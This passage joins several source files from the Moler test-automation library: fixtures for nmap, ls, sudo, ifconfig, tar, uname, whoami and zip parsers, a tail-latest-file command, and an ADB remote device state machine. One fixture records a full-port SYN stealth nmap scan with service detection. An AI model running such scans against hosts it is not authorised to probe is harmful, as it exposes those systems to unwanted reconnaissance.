Starting Nmap 6.47 ( http://nmap.org ) at 2019-06-21 14:33 CEST
21 14:30:54.167 <|NSE: Loaded 29 scripts for scanning.
21 14:30:54.170 <|
|Initiating Parallel DNS resolution of 1 host. at 14:33
21 14:30:54.173 <|Completed Parallel DNS resolution of 1 host. at 14:33, 0.01s elapsed
|DNS resolution of 1 IPs took 0.01s. Mode: Async [#: 1, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
21 14:30:54.189 <|Initiating SYN Stealth Scan at 14:33
|Scanning 1.1.1.4 [65535 ports]
21 14:30:54.395 <|Discovered open port 22/tcp on 1.1.1.4
|Discovered open port 80/tcp on 1.1.1.4
21 14:30:54.397 <|
|Discovered open port 443/tcp on 1.1.1.4
21 14:31:19.398 <|Increasing send delay for 10.83.182.11 from 0 to 5 due to 11 out of 33 dropped probes since last increase.
21 14:31:24.403 <|SYN Stealth Scan Timing: About 4.82% done; ETC: 14:43 (0:10:13 remaining)
21 14:31:24.405 |Extended timeout from 120.00 with delta 613.00 to 733.00
21 14:31:24.406 |Extended timeout from 120.00 with delta 613.00 to 733.00
21 14:31:45.896 <|Increasing send delay for 10.83.182.11 from 5 to 10 due to 11 out of 34 dropped probes since last increase.
21 14:31:54.237 <|SYN Stealth Scan Timing: About 5.32% done; ETC: 14:52 (0:18:05 remaining)
21 14:31:54.238 |Extended timeout from 733.00 with delta 1085.00 to 1818.00
21 14:31:54.239 |Extended timeout from 733.00 with delta 1085.00 to 1818.00
21 14:32:13.519 <|Increasing send delay for 10.83.182.11 from 10 to 20 due to 11 out of 32 dropped probes since last increase.
21 14:32:24.057 <|SYN Stealth Scan Timing: About 6.84% done; ETC: 14:55 (0:20:40 remaining)
21 14:32:24.058 |Extended timeout from 1818.00 with delta 1240.00 to 3058.00
21 14:32:24.059 |Extended timeout from 1818.00 with delta 1240.00 to 3058.00
21 14:32:42.300 <|Increasing send delay for 10.83.182.11 from 20 to 40 due to 11 out of 34 dropped probes since last increase.
21 14:32:53.886 <|SYN Stealth Scan Timing: About 8.35% done; ETC: 14:57 (0:22:08 remaining)
21 14:32:53.888 |Extended timeout from 3058.00 with delta 1328.00 to 4386.00
user@client:~/moler$ """
COMMAND_RESULT_dynamic_timeout = {
'SYN_STEALTH_SCAN': {
'DONE': '8.35',
'ETC': '14:57',
'REMAINING': '0:22:08'
}
}
COMMAND_KWARGS_dynamic_timeout = {
'cmd_class_name': r'moler.cmd.unix.nmap.Nmap',
'password': r'<PASSWORD>',
'cmd_params': {
'options': r'-sS -sV -p- -P0 -vvv --reason --webxml --min-rate 100 --max-rate 300 -oA ipv4',
'ip': r'1.1.1.4',
'is_ping': False
}
}
COMMAND_OUTPUT_ls = """
user@client:~/moler$ sudo ls -l
[sudo] password for user:
total 8
drwxr-xr-x 2 root root 4096 Sep 25 2014 bin
drwxr-xr-x 5 root root 4096 Mar 20 2015 btslog2
-rw-r--r-- 1 root root 51 Dec 15 10:48 getfzmip.txt
-rw-r--r-- 1 root root 24 Dec 15 10:48 getfzmip.txt-old.20171215-104858.txt
lrwxrwxrwx 1 root root 4 Mar 20 2015 bcn -> /bcn
lrwxrwxrwx 1 root root 10 Mar 20 2015 logsremote -> /mnt/logs/
user@client:~/moler$ """
COMMAND_RESULT_ls = {
"total": {
"raw": "8",
"bytes": 8,
},
"files": {
"bin": {"permissions": "drwxr-xr-x", "hard_links_count": 2, "owner": "root", "group": "root",
"size_bytes": 4096, "size_raw": "4096", "date": "Sep 25 2014", "name": "bin", },
"btslog2": {"permissions": "drwxr-xr-x", "hard_links_count": 5, "owner": "root", "group": "root",
"size_bytes": 4096, "size_raw": "4096", "date": "Mar 20 2015", "name": "btslog2", },
"getfzmip.txt": {"permissions": "-rw-r--r--", "hard_links_count": 1, "owner": "root", "group": "root",
"size_bytes": 51, "size_raw": "51", "date": "Dec 15 10:48", "name": "getfzmip.txt", },
"getfzmip.txt-old.20171215-104858.txt": {"permissions": "-rw-r--r--", "hard_links_count": 1,
"owner": "root",
"group": "root", "size_bytes": 24, "size_raw": "24",
"date": "Dec 15 10:48",
"name": "getfzmip.txt-old.20171215-104858.txt", },
"bcn": {"permissions": "lrwxrwxrwx", "hard_links_count": 1, "owner": "root", "group": "root",
"size_bytes": 4,
"size_raw": "4", "date": "Mar 20 2015", "name": "bcn", "link": "/bcn"},
"logsremote": {"permissions": "lrwxrwxrwx", "hard_links_count": 1, "owner": "root", "group": "root",
"size_bytes": 10, "size_raw": "10", "date": "Mar 20 2015", "name": "logsremote",
"link": "/mnt/logs/"},
},
}
COMMAND_KWARGS_ls = {
"cmd_class_name": "moler.cmd.unix.ls.Ls",
"cmd_params": {"options": "-l"},
"password": "<PASSWORD>",
}
COMMAND_OUTPUT_ifconfigdown = """
moler_bash# sudo ifconfig lo down
moler_bash#"""
COMMAND_RESULT_ifconfigdown = {}
COMMAND_KWARGS_ifconfigdown = {
"cmd_class_name": "moler.cmd.unix.ifconfig.Ifconfig",
"password": "<PASSWORD>",
"cmd_params": {"options": "lo down"},
}
COMMAND_OUTPUT_i = """
moler_bash# sudo -i
root@host#"""
COMMAND_RESULT_i = {}
COMMAND_KWARGS_i = {
'sudo_params': '-i', 'expected_prompt': "root@host.*#"
}
COMMAND_OUTPUT_su = """
moler_bash# sudo su
root@host#"""
COMMAND_RESULT_su = {}
COMMAND_KWARGS_su = {
'expected_prompt': r"root@host.*#",
'cmd_class_name': 'moler.cmd.unix.su.Su',
'cmd_params': { # params for su
'expected_prompt': r"root@host.*#"
}
}
COMMAND_OUTPUT_sudo_su_pwd = """user@host$ sudo su -c 'pwd -P'
/home/auto/inv
user@host$"""
COMMAND_KWARGS_sudo_su_pwd = {
'cmd_class_name': 'moler.cmd.unix.su.Su', # su as parameter of sudo
'cmd_params': { # parameters for sudo
'cmd_class_name': 'moler.cmd.unix.pwd.Pwd', # pwd as parameter for sudo
'cmd_params': {'options': '-P'} # parameters for pwd
}
}
COMMAND_RESULT_sudo_su_pwd = {'full_path': '/home/auto/inv', 'path_to_current': '/home/auto', 'current_path': 'inv'}
COMMAND_OUTPUT_reboot = """sudo reboot
Connection to 192.168.255.179 closed by remote host.
"""
COMMAND_KWARGS_reboot = {
'cmd_class_name': 'moler.cmd.unix.reboot.Reboot', # reboot as parameter of sudo
}
COMMAND_RESULT_reboot = {
'RESULT': 'Connection to 192.168.255.179 closed by remote host.'
}
```
#### File: cmd/unix/tail_latest_file.py
```python
import os
import time
from moler.cmd.unix.genericunix import GenericUnixCommand
__author__ = '<NAME>'
__copyright__ = 'Copyright (C) 2020, Nokia'
__email__ = '<EMAIL>'
class TailLatestFile(GenericUnixCommand):
def __init__(self, connection, directory, file_pattern="*", prompt=None, newline_chars=None, runner=None,
time_for_failure=0.1):
"""
Command for tail latest file from the directory.
:param connection: Moler connection to device, terminal when command is executed.
:param directory: path to directory to tail.
:param file_pattern: pattern for files from directory.
:param prompt: prompt (on system where command runs).
:param newline_chars: Characters to split lines - list.
:param runner: Runner to run command.
:param time_for_failure: time (in seconds) for failure indication from first line of output. Set to 0 if skip
all failure indications.
"""
super(TailLatestFile, self).__init__(connection=connection, prompt=prompt, newline_chars=newline_chars,
runner=runner)
self.directory = directory
self.file_pattern = file_pattern
self.ret_required = False
self.time_for_failure = time_for_failure
self._first_line_time = None
self._check_failure_indication = True
self._multiline_cmd = True
def build_command_string(self):
"""
Build command string from parameters passed to object.
:return: String representation of command to send over connection to device.
"""
file_path = os.path.join(self.directory, self.file_pattern)
bash_script = "bash -c '\n" \
'echo "Press [CTRL+C] to stop.."\n' \
r'trap "kill \$tail_pid; exit" INT' \
'\n' \
'last_file=""\n' \
'tail_pid=""\n' \
'file_index=0\n' \
'while :\n' \
'do\n' \
'current_last_file=`ls -t {} | head -1`\n' \
'if [ "$last_file" != "$current_last_file" ]\n' \
'then\n' \
'[ -n "$tail_pid" ] && kill $tail_pid\n' \
'last_file=$current_last_file\n' \
'if [ "$file_index" -eq 0 ]\n' \
'then\n' \
'tail -f $last_file &\n' \
'else\n' \
'tail -f -n +1 $last_file &\n' \
'fi\n' \
'tail_pid=$!\n' \
'((file_index=file_index+1))\n' \
'fi\n' \
'sleep 0.5\n' \
"done'"
cmd = bash_script.format(file_path)
return cmd
def on_new_line(self, line, is_full_line):
"""
Parse line from command output.
:param line: Line from device
:param is_full_line: True if line had new line chars, False otherwise
:return: None
"""
if is_full_line:
if not self._first_line_time:
self._first_line_time = time.time()
super(TailLatestFile, self).on_new_line(line=line, is_full_line=is_full_line)
def is_failure_indication(self, line):
"""
Check if line has info about failure indication.
:param line: Line from device
:return: None if line does not match regex with failure, Match object if line matches the failure regex.
"""
if self._check_failure_indication:
if time.time() - self._first_line_time < self.time_for_failure:
return self._regex_helper.search_compiled(self._re_fail, line)
else:
self._check_failure_indication = False # do not check time for future output. It's too late already.
return None
COMMAND_OUTPUT = r"""
user@host:~$ bash -c '
echo "Press [CTRL+C] to stop.."
trap "kill \$tail_pid; exit" INT
last_file=""
tail_pid=""
file_index=0
while :
do
current_last_file=`ls -t /tmp/sample_file* | head -1`
if [ "$last_file" != "$current_last_file" ]
then
[ -n "$tail_pid" ] && kill $tail_pid
last_file=$current_last_file
if [ "$file_index" -eq 0 ]
then
tail -f $last_file &
else
tail -f -n +1 $last_file &
fi
tail_pid=$!
((file_index=file_index+1))
fi
sleep 0.5
done'
Press [CTRL+C] to stop..
VmallocChunk: 34359608824 kB
HardwareCorrupted: 0 kB
AnonHugePages: 0 kB
HugePages_Total: 0
HugePages_Free: 0
HugePages_Rsvd: 0
HugePages_Surp: 0
Hugepagesize: 2048 kB
DirectMap4k: 53184 kB
DirectMap2M: 4141056 kB
user@host:~$
"""
COMMAND_RESULT = {}
COMMAND_KWARGS = {
"directory": "/tmp",
"file_pattern": "sample_file*",
}
COMMAND_OUTPUT_command_not_found_in_output = r"""
user@server:~> bash -c '
echo "Press [CTRL+C] to stop.."
trap "kill \$tail_pid; exit" INT
last_file=""
tail_pid=""
file_index=0
while :
do
current_last_file=`ls -t /tmp/* | head -1`
if [ "$last_file" != "$current_last_file" ]
then
[ -n "$tail_pid" ] && kill $tail_pid
last_file=$current_last_file
if [ "$file_index" -eq 0 ]
then
tail -f $last_file &
else
tail -f -n +1 $last_file &
fi
tail_pid=$!
((file_index=file_index+1))
fi
sleep 0.5
done'
36B9 INF/LFS/LinuxSyslog error=No such file or directory
user@server:~>"""
COMMAND_RESULT_command_not_found_in_output = {
}
COMMAND_KWARGS_command_not_found_in_output = {
"directory": "/tmp",
"time_for_failure": 0
}
```
#### File: cmd/unix/tar.py
```python
from moler.cmd.unix.genericunix import GenericUnixCommand
__author__ = '<NAME>'
__copyright__ = 'Copyright (C) 2018, Nokia'
__email__ = '<EMAIL>'
class Tar(GenericUnixCommand):
def __init__(self, connection, options, file, prompt=None, newline_chars=None, runner=None):
super(Tar, self).__init__(connection=connection, prompt=prompt, newline_chars=newline_chars, runner=runner)
# Parameters defined by calling the command
self.options = options
self.file = file
self.ret_required = False
def build_command_string(self):
cmd = "tar"
cmd = cmd + " " + self.options + " " + self.file
return cmd
COMMAND_OUTPUT = """
host:~ # tar xzvf test.tar.gz
test.1
test.2
test.3
host:~ # """
COMMAND_RESULT = {
}
COMMAND_KWARGS = {
"options": "xzvf",
"file": "test.tar.gz",
}
```
#### File: cmd/unix/uname.py
```python
__author__ = '<NAME>'
__copyright__ = 'Copyright (C) 2018, Nokia'
__email__ = '<EMAIL>'
from moler.cmd.unix.genericunix import GenericUnixCommand
from moler.exceptions import CommandFailure
from moler.exceptions import ParsingDone
import re
class Uname(GenericUnixCommand):
def __init__(self, connection, options=None, prompt=None, newline_chars=None, runner=None):
super(Uname, self).__init__(connection=connection, prompt=prompt, newline_chars=newline_chars, runner=runner)
self.options = options
self.current_ret['RESULT'] = list()
def build_command_string(self):
cmd = "uname"
if self.options:
cmd = cmd + " " + self.options
return cmd
def on_new_line(self, line, is_full_line):
if is_full_line:
try:
self._command_error(line)
self._parse(line)
except ParsingDone:
pass
return super(Uname, self).on_new_line(line, is_full_line)
_re_invalid_option = re.compile(r"uname:\s(invalid|unknown)\soption\s(?P<OPTION>.*)", re.IGNORECASE)
_re_command_fail = re.compile(r"uname:\sextra\soperand\s(?P<COMMAND>.*)", re.IGNORECASE)
def _command_error(self, line):
if self._regex_helper.search_compiled(Uname._re_invalid_option, line):
self.set_exception(CommandFailure(self, "ERROR: {}".format(self._regex_helper.group("OPTION"))))
raise ParsingDone
elif self._regex_helper.search_compiled(Uname._re_command_fail, line):
self.set_exception(CommandFailure(self, "ERROR: {}".format(self._regex_helper.group("COMMAND"))))
raise ParsingDone
def _parse(self, line):
self.current_ret["RESULT"].append(line)
raise ParsingDone
# -----------------------------------------------------------------------------
# Following documentation is required for library CI.
# It is used to perform command self-test.
# Parameters: -a ; -s
# -----------------------------------------------------------------------------
COMMAND_OUTPUT_ver_execute = """
xyz@debian:~$ uname -a
Linux debian 4.9.0-6-amd64 #1 SMP
Debian 4.9.88-1+deb9u1 (2018-05-07) x86_64 GNU/Linux
xyz@debian:~$"""
COMMAND_KWARGS_ver_execute = {
'options': '-a'
}
COMMAND_RESULT_ver_execute = {
'RESULT': ['Linux debian 4.9.0-6-amd64 #1 SMP', 'Debian 4.9.88-1+deb9u1 (2018-05-07) x86_64 GNU/Linux']
}
COMMAND_OUTPUT_without_option = """
xyz@debian:~$ uname
Linux
xyz@debian:~$"""
COMMAND_KWARGS_without_option = {'options': None}
COMMAND_RESULT_without_option = {'RESULT': ['Linux']}
```
#### File: cmd/unix/whoami.py
```python
__author__ = '<NAME>'
__copyright__ = 'Copyright (C) 2018, Nokia'
__email__ = '<EMAIL>'
import re
from moler.cmd.unix.genericunix import GenericUnixCommand
from moler.exceptions import ParsingDone
class Whoami(GenericUnixCommand):
def __init__(self, connection, prompt=None, newline_chars=None, runner=None):
super(Whoami, self).__init__(connection=connection, prompt=prompt, newline_chars=newline_chars, runner=runner)
def build_command_string(self):
cmd = "whoami"
return cmd
def on_new_line(self, line, is_full_line):
if is_full_line:
try:
self._parse_user(line)
except ParsingDone:
pass
return super(Whoami, self).on_new_line(line, is_full_line)
_re_user = re.compile(r"(?P<User>\S+)\s*$")
def _parse_user(self, line):
if self._regex_helper.search_compiled(Whoami._re_user, line):
self.current_ret["USER"] = self._regex_helper.group("User")
raise ParsingDone
COMMAND_OUTPUT = """
host:~ # whoami
ute
host:~ #"""
COMMAND_RESULT = {
"USER": "ute"
}
COMMAND_KWARGS = {}
```
#### File: cmd/unix/zip.py
```python
__author__ = '<NAME>'
__copyright__ = 'Copyright (C) 2018, Nokia'
__email__ = '<EMAIL>'
import re
from moler.cmd.unix.genericunix import GenericUnixCommand
from moler.exceptions import CommandFailure, ParsingDone
class Zip(GenericUnixCommand):
def __init__(self, connection, options, file_name, zip_file, timeout=60, prompt=None, newline_chars=None,
runner=None):
super(Zip, self).__init__(connection=connection, prompt=prompt, newline_chars=newline_chars, runner=runner)
# Parameters defined by calling the command
self.options = options
self.file_name = file_name
self.zip_file = zip_file
self.ret_required = False
self.timeout = timeout
def build_command_string(self):
if self.options:
cmd = "{} {} {} {}".format("zip", self.options, self.zip_file, self.file_name)
else:
cmd = "{} {} {}".format("zip", self.zip_file, self.file_name)
return cmd
def on_new_line(self, line, is_full_line):
if is_full_line:
try:
self._parse_error_via_output_line(line)
except ParsingDone:
pass # line has been fully parsed by one of above parse-methods
return super(Zip, self).on_new_line(line, is_full_line)
_re_zip_line = re.compile(r'(?P<error>zip error:.*)')
def _parse_error_via_output_line(self, line):
if self._cmd_output_started and self._regex_helper.search_compiled(Zip._re_zip_line, line):
self.set_exception(CommandFailure(self, "ERROR: {}".format(self._regex_helper.group("error"))))
raise ParsingDone
COMMAND_OUTPUT = """
host:~ # zip test.zip test.txt
adding: test.txt (deflated 76%)
host:~ # """
COMMAND_RESULT = {
}
COMMAND_KWARGS = {
"options": "",
"zip_file": "test.zip",
"file_name": "test.txt",
}
```
#### File: moler/moler/connection.py
```python
__author__ = '<NAME>, <NAME>, <NAME>'
__copyright__ = 'Copyright (C) 2018-2020, Nokia'
__email__ = '<EMAIL>, <EMAIL>, <EMAIL>'
from moler.abstract_moler_connection import AbstractMolerConnection
import logging
def identity_transformation(data):
"""Use default coder is no encoding/decoding."""
logging.log(logging.WARNING, "identity_transformation from connection.py is deprecated now. Please use"
" abstract_moler_connection.py.")
return data
class Connection(AbstractMolerConnection):
"""Require. Connection API required by ConnectionObservers."""
def __init__(self, *args, **kwargs):
"""
Init he connection.
:param args: parameters for base class.
:param kwargs: parameters for base class.
"""
super(Connection, self).__init__(*args, **kwargs)
self._log(logging.WARNING, "Class Connection is deprecated now. Please use AbstractMolerConnection.")
```
#### File: moler/device/adbremote2.py
```python
__author__ = '<NAME>'
__copyright__ = 'Copyright (C) 2020, Nokia'
__email__ = '<EMAIL>'
import logging
from moler.device.textualdevice import TextualDevice
from moler.device.unixlocal import UnixLocal
from moler.device.proxy_pc2 import ProxyPc2, PROXY_PC
from moler.device.unixremote2 import UnixRemote2, UNIX_REMOTE, UNIX_REMOTE_ROOT
from moler.cmd.adb.adb_shell import AdbShell
from moler.helpers import call_base_class_method_with_same_name, mark_to_call_base_class_method_with_same_name
# helper variables to improve readability of state machines
# f.ex. moler.device.textualdevice introduces state TextualDevice.not_connected = "NOT_CONNECTED"
NOT_CONNECTED = TextualDevice.not_connected
CONNECTION_HOPS = TextualDevice.connection_hops
UNIX_LOCAL = UnixLocal.unix_local
UNIX_LOCAL_ROOT = UnixLocal.unix_local_root
ADB_SHELL = "ADB_SHELL"
ADB_SHELL_ROOT = "ADB_SHELL_ROOT"
@call_base_class_method_with_same_name
class AdbRemote2(UnixRemote2):
r"""
AdbRemote device class.
Example of device in yaml configuration file:
- with PROXY_PC and io "terminal":
ADB_1:
DEVICE_CLASS: moler.device.adbremote2.AdbRemote2
CONNECTION_HOPS:
UNIX_LOCAL:
PROXY_PC:
execute_command: ssh # default value
command_params:
expected_prompt: proxy_pc_prompt
host: host_ip
login: login
password: password
PROXY_PC:
UNIX_REMOTE:
execute_command: ssh # default value
command_params:
expected_prompt: unix_remote_prompt
host: host_ip
login: login
password: password
UNIX_REMOTE:
ADB_SHELL:
execute_command: adb_shell # default value
command_params:
serial_number: 'f57e6b7d'
- with PROXY_PC and remote-access-io like "sshshell":
ADB_1:
DEVICE_CLASS: moler.device.adbremote2.AdbRemote2
CONNECTION_DESC:
io_type: sshshell
host: host_ip
login: login
password: password
CONNECTION_HOPS:
PROXY_PC:
UNIX_REMOTE:
execute_command: ssh # default value
command_params:
expected_prompt: unix_remote_prompt
host: host_ip
login: login
password: password
UNIX_REMOTE:
ADB_SHELL:
execute_command: adb_shell # default value
command_params:
serial_number: 'f57e6b7d'
-without PROXY_PC and io "terminal":
ADB_1:
DEVICE_CLASS: moler.device.adbremote2.AdbRemote2
CONNECTION_HOPS:
UNIX_LOCAL:
UNIX_REMOTE:
execute_command: ssh # default value
command_params:
expected_prompt: unix_remote_prompt
host: host_ip
login: login
password: password
UNIX_REMOTE:
ADB_SHELL:
execute_command: adb_shell # default value
command_params:
serial_number: 'f57e6b7d'
-without PROXY_PC and remote-access-io like "sshshell":
ADB_1:
DEVICE_CLASS: moler.device.adbremote2.AdbRemote2
CONNECTION_DESC:
io_type: sshshell
host: host_ip
login: login
password: password
CONNECTION_HOPS:
UNIX_REMOTE:
ADB_SHELL:
execute_command: adb_shell # default value
command_params:
serial_number: 'f57e6b7d'
"""
def __init__(self, sm_params, name=None, io_connection=None, io_type=None, variant=None, io_constructor_kwargs=None,
initial_state=None, lazy_cmds_events=False):
"""
Create ADB device communicating over io_connection
:param sm_params: dict with parameters of state machine for device
:param name: name of device
:param io_connection: External-IO connection having embedded moler-connection
:param io_type: type of connection - tcp, udp, ssh, telnet, ...
:param variant: connection implementation variant, ex. 'threaded', 'twisted', 'asyncio', ...
(if not given then default one is taken)
:param io_constructor_kwargs: additional parameter into constructor of selected connection type
(if not given then default one is taken)
:param initial_state: name of initial state. State machine tries to enter this state just after creation.
:param lazy_cmds_events: set False to load all commands and events when device is initialized, set True to load
commands and events when they are required for the first time.
"""
initial_state = initial_state if initial_state is not None else ADB_SHELL
super(AdbRemote2, self).__init__(name=name, io_connection=io_connection,
io_type=io_type, variant=variant,
io_constructor_kwargs=io_constructor_kwargs,
sm_params=sm_params, initial_state=initial_state,
lazy_cmds_events=lazy_cmds_events)
@mark_to_call_base_class_method_with_same_name
def _get_default_sm_configuration_with_proxy_pc(self):
config = self._get_default_sm_configuration_for_adbshell()
return config
@mark_to_call_base_class_method_with_same_name
def _get_default_sm_configuration_without_proxy_pc(self):
config = self._get_default_sm_configuration_for_adbshell()
return config
@staticmethod
def _get_default_sm_configuration_for_adbshell():
config = {
CONNECTION_HOPS: {
UNIX_REMOTE: { # from
ADB_SHELL: { # to
"execute_command": "adb_shell",
"command_params": { # with parameters
"target_newline": "\n",
"prompt_from_serial_number": True,
},
"required_command_params": [
"serial_number",
]
},
},
ADB_SHELL: { # from
UNIX_REMOTE: { # to
"execute_command": "exit", # using command
"command_params": { # with parameters
"expected_prompt": r'remote_user_prompt', # overwritten in _configure_state_machine()
"target_newline": "\n",
"allowed_newline_after_prompt": True,
},
"required_command_params": [
]
},
ADB_SHELL_ROOT: { # to
"execute_command": "su", # using command
"command_params": { # with parameters
"password": "<PASSWORD>", # if su requires passwd and not given in cfg
"expected_prompt": None, # overwritten in _prepare_state_prompts...()
"target_newline": None, # overwritten in _prepare_newline_chars_...()
},
"required_command_params": [
]
},
},
ADB_SHELL_ROOT: { # from
ADB_SHELL: { # to
"execute_command": "exit", # using command
"command_params": { # with parameters
"expected_prompt": r'adb_prompt', # overwritten in _configure_state_machine()
"target_newline": "\n"
},
"required_command_params": [
]
},
},
}
}
return config
@mark_to_call_base_class_method_with_same_name
def _prepare_transitions_with_proxy_pc(self):
transitions = self._prepare_transitions_for_sshshell()
return transitions
@mark_to_call_base_class_method_with_same_name
def _prepare_transitions_without_proxy_pc(self):
transitions = self._prepare_transitions_for_sshshell()
return transitions
@staticmethod
def _prepare_transitions_for_sshshell():
transitions = {
UNIX_REMOTE: {
ADB_SHELL: {
"action": [
"_execute_command_to_change_state"
],
}
},
ADB_SHELL: {
UNIX_REMOTE: {
"action": [
"_execute_command_to_change_state"
],
},
ADB_SHELL_ROOT: {
"action": [
"_execute_command_to_change_state"
],
}
},
ADB_SHELL_ROOT: {
ADB_SHELL: {
"action": [
"_execute_command_to_change_state"
],
},
},
}
return transitions
@mark_to_call_base_class_method_with_same_name
def _prepare_state_prompts_with_proxy_pc(self):
state_prompts = self._prepare_state_prompts_for_sshshell()
return state_prompts
@mark_to_call_base_class_method_with_same_name
def _prepare_state_prompts_without_proxy_pc(self):
state_prompts = self._prepare_state_prompts_for_sshshell()
return state_prompts
def _prepare_state_prompts_for_sshshell(self):
hops_config = self._configurations[CONNECTION_HOPS]
cfg_ux2adb = hops_config[UNIX_REMOTE][ADB_SHELL]
cfg_adb2adbroot = hops_config[ADB_SHELL][ADB_SHELL_ROOT]
adb_shell_cmd_params = cfg_ux2adb["command_params"]
adb_shell_prompt = self._get_adb_shell_prompt(adb_shell_cmd_params)
adb_shell_root_prompt = cfg_adb2adbroot["command_params"]["expected_prompt"]
if adb_shell_root_prompt is None:
if adb_shell_prompt.endswith("$"):
adb_shell_root_prompt = adb_shell_prompt[:-1] + "#"
else:
consequence = "Won't be able to detect {} state".format(ADB_SHELL_ROOT)
fix = "Please provide configuration with 'expected_prompt' for {} state".format(ADB_SHELL_ROOT)
self._log(logging.WARNING, "Unknown prompt for {} state. {}. {}.".format(ADB_SHELL_ROOT,
consequence, fix))
adb_shell_root_prompt = "Unknown_adb_root_prompt"
state_prompts = {
ADB_SHELL: adb_shell_prompt,
ADB_SHELL_ROOT: adb_shell_root_prompt,
}
return state_prompts
@property
def _serial_number(self):
"""
Retrieve serial_number based on required parameter of state machine.
:return: serial_number.
"""
hops_config = self._configurations[CONNECTION_HOPS]
cfg_ux2adb = hops_config[UNIX_REMOTE][ADB_SHELL]
serial_number = cfg_ux2adb["command_params"]["serial_number"]
return serial_number
def _get_adb_shell_prompt(self, adb_shell_cmd_params):
adb_shell_prompt = None
if 'expected_prompt' in adb_shell_cmd_params:
adb_shell_prompt = adb_shell_cmd_params["expected_prompt"]
if not adb_shell_prompt:
# adb_shell@f57e6b77 $
adb_shell_prompt = AdbShell.re_generated_prompt.format(self._serial_number)
return adb_shell_prompt
@mark_to_call_base_class_method_with_same_name
def _prepare_newline_chars_with_proxy_pc(self):
newline_chars = self._prepare_newline_chars_for_sshshell()
return newline_chars
@mark_to_call_base_class_method_with_same_name
def _prepare_newline_chars_without_proxy_pc(self):
newline_chars = self._prepare_newline_chars_for_sshshell()
return newline_chars
def _prepare_newline_chars_for_sshshell(self):
hops_config = self._configurations[CONNECTION_HOPS]
cfg_ux2adb = hops_config[UNIX_REMOTE][ADB_SHELL]
cfg_adb2adbroot = hops_config[ADB_SHELL][ADB_SHELL_ROOT]
adb_shell_newline = cfg_ux2adb["command_params"]["target_newline"]
adb_shell_root_newline = cfg_adb2adbroot["command_params"]["target_newline"]
if adb_shell_root_newline is None:
adb_shell_root_newline = adb_shell_newline # we are on same machine just changing to root
newline_chars = {
ADB_SHELL: adb_shell_newline,
ADB_SHELL_ROOT: adb_shell_root_newline,
}
return newline_chars
@mark_to_call_base_class_method_with_same_name
def _prepare_state_hops_with_proxy_pc(self):
if self._use_local_unix_state:
state_hops = {
NOT_CONNECTED: {
UNIX_LOCAL_ROOT: UNIX_LOCAL,
PROXY_PC: UNIX_LOCAL,
UNIX_REMOTE: UNIX_LOCAL,
UNIX_REMOTE_ROOT: UNIX_LOCAL,
ADB_SHELL: UNIX_LOCAL,
ADB_SHELL_ROOT: UNIX_LOCAL,
},
UNIX_LOCAL: {
UNIX_REMOTE: PROXY_PC,
UNIX_REMOTE_ROOT: PROXY_PC,
ADB_SHELL: PROXY_PC,
ADB_SHELL_ROOT: PROXY_PC,
},
UNIX_LOCAL_ROOT: {
NOT_CONNECTED: UNIX_LOCAL,
PROXY_PC: UNIX_LOCAL,
UNIX_REMOTE: UNIX_LOCAL,
UNIX_REMOTE_ROOT: UNIX_LOCAL,
ADB_SHELL: UNIX_LOCAL,
ADB_SHELL_ROOT: UNIX_LOCAL,
},
PROXY_PC: {
NOT_CONNECTED: UNIX_LOCAL,
UNIX_LOCAL_ROOT: UNIX_LOCAL,
UNIX_REMOTE_ROOT: UNIX_REMOTE,
ADB_SHELL: UNIX_REMOTE,
ADB_SHELL_ROOT: UNIX_REMOTE,
},
UNIX_REMOTE: {
NOT_CONNECTED: PROXY_PC,
UNIX_LOCAL: PROXY_PC,
UNIX_LOCAL_ROOT: PROXY_PC,
ADB_SHELL_ROOT: ADB_SHELL,
},
UNIX_REMOTE_ROOT: {
NOT_CONNECTED: UNIX_REMOTE,
UNIX_LOCAL: UNIX_REMOTE,
UNIX_LOCAL_ROOT: UNIX_REMOTE,
PROXY_PC: UNIX_REMOTE,
ADB_SHELL: UNIX_REMOTE,
ADB_SHELL_ROOT: UNIX_REMOTE,
},
ADB_SHELL: {
NOT_CONNECTED: UNIX_REMOTE,
UNIX_LOCAL: UNIX_REMOTE,
UNIX_LOCAL_ROOT: UNIX_REMOTE,
PROXY_PC: UNIX_REMOTE,
UNIX_REMOTE_ROOT: UNIX_REMOTE,
},
ADB_SHELL_ROOT: {
NOT_CONNECTED: ADB_SHELL,
UNIX_LOCAL: ADB_SHELL,
UNIX_LOCAL_ROOT: ADB_SHELL,
PROXY_PC: ADB_SHELL,
UNIX_REMOTE: ADB_SHELL,
UNIX_REMOTE_ROOT: ADB_SHELL,
},
}
else:
state_hops = {
NOT_CONNECTED: {
UNIX_REMOTE: PROXY_PC,
UNIX_REMOTE_ROOT: PROXY_PC,
ADB_SHELL: PROXY_PC,
ADB_SHELL_ROOT: PROXY_PC,
},
PROXY_PC: {
UNIX_REMOTE_ROOT: UNIX_REMOTE,
ADB_SHELL: UNIX_REMOTE,
ADB_SHELL_ROOT: UNIX_REMOTE,
},
UNIX_REMOTE: {
NOT_CONNECTED: PROXY_PC,
ADB_SHELL_ROOT: ADB_SHELL,
},
UNIX_REMOTE_ROOT: {
NOT_CONNECTED: UNIX_REMOTE,
PROXY_PC: UNIX_REMOTE,
ADB_SHELL: UNIX_REMOTE,
ADB_SHELL_ROOT: UNIX_REMOTE,
},
ADB_SHELL: {
NOT_CONNECTED: UNIX_REMOTE,
PROXY_PC: UNIX_REMOTE,
UNIX_REMOTE_ROOT: UNIX_REMOTE,
},
ADB_SHELL_ROOT: {
NOT_CONNECTED: ADB_SHELL,
PROXY_PC: ADB_SHELL,
UNIX_REMOTE: ADB_SHELL,
UNIX_REMOTE_ROOT: ADB_SHELL,
},
}
return state_hops
@mark_to_call_base_class_method_with_same_name
def _prepare_state_hops_without_proxy_pc(self):
if self._use_local_unix_state:
state_hops = {
NOT_CONNECTED: {
UNIX_LOCAL_ROOT: UNIX_LOCAL,
UNIX_REMOTE: UNIX_LOCAL,
UNIX_REMOTE_ROOT: UNIX_LOCAL,
ADB_SHELL: UNIX_LOCAL,
ADB_SHELL_ROOT: UNIX_LOCAL,
},
UNIX_LOCAL: {
UNIX_REMOTE_ROOT: UNIX_REMOTE,
ADB_SHELL: UNIX_REMOTE,
ADB_SHELL_ROOT: UNIX_REMOTE,
},
UNIX_LOCAL_ROOT: {
NOT_CONNECTED: UNIX_LOCAL,
UNIX_REMOTE: UNIX_LOCAL,
UNIX_REMOTE_ROOT: UNIX_LOCAL,
ADB_SHELL: UNIX_LOCAL,
ADB_SHELL_ROOT: UNIX_LOCAL,
},
